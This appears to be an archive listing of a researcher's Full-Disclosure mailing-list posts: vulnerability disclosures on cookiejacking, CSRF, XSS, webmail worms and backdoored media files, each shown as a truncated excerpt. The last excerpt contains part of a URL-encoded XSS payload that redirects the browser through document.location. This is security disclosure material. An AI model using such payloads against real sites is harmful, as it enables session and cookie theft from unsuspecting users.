Re: [Full-disclosure] Cookiejacking attack technique

y cookie (http only, secure cookies, whatever the > website) > > of every Win user! > > > > If it is interesting, on my blog you can find a writeup and a couple of > > videos. > > https://sites.google.com/site/tentacoloviola/cookiejacking > > > > Regards > > &g

[Full-disclosure] Cookiejacking attack technique

kies. You can steal any cookie (http only, secure cookies, whatever the website) of every Win user! If it is interesting, on my blog you can find a writeup and a couple of videos. https://sites.google.com/site/tentacoloviola/cookiejacking Regards Rosario Val

[Full-disclosure] Outlook web access 2007 CSRF

a OWA user. Regards, Rosario Valotta ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Twitter "swine flu" worm

in the error page has been patched by Twitter few days after our disclosure. The Unicode issue is still there. Regards Rosario Valotta + Matteo Carlo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html

[Full-disclosure] Backdooring Windows Media Files (once again...)

nvironment All the details are available at: http://sites.google.com/site/tentacoloviola/backdooring-windows-media-files Regards Rosario Valotta ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html

[Full-disclosure] Backdooring windows media files (once again)

scanning in an Intranet environment All the details are available at: http://sites.google.com/site/tentacoloviola/backdooring-windows-media-files Regards Rosario Valotta ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/

[Full-disclosure] ANSA editorial system vulnerable

oglepages.com After notification, ANSA IT department has solved the issues. Regards, Rosario Valotta ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XWW - Cross webmail Worm - PoC

found at: http://rosario.valotta.googlepages.com/home Regards, Rosario Valotta rosario dot valotta at gmail.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -

[Full-disclosure] Tiscali webmail exploited

Tiscali.it (big italian ISP) webmail is affected by a severe vulnerability; in the email composer a user is allowed to insert a hyperlink specifying the link URL. This feature can be used to inject malicious HTML code in the form, allowing the execution of arbitrary code. On the submitted URL some

[Full-disclosure] Severe CSRF vulnerabilities allow mail/msg spoofing in Libero.it portal

POC (until not deleted) can be found at : http://digilander.libero.it/testxss/demo/img.htm http://digilander.libero.it/testxss/demo/img2.htm both require you're logged in libero Community. Greetings, Rosario Valotta rosario.valotta at gmail dot com <---end--> __

[Full-disclosure] Widespread vulnerabilities in Libero.it/Infostrada.it web portals

<--start--> Following the advisory of the XSS vulnerability found on Libero.it (italian ISP) portal, and after the "official" response given by the portal owners which stated that in no way user accounts would be at risk, several other XSS vulns have been found on Libero.it/Infostrada.it portals (b

[Full-disclosure] Libero.it (italian ISP) XSS vulnerability

D%70%63%65%6E%74%2B%73%74%72%2E%73%75%62%73%74%72%69%6E%67%28%69%2C%69%2B%32%29%7D%3B%0D%0A%74%6F%74%3D%75%6E%65%73%63%61%70%65%28%74%65%6D%70%29%2B%63%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%74%6F%74%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E Greetings, Rosario Valott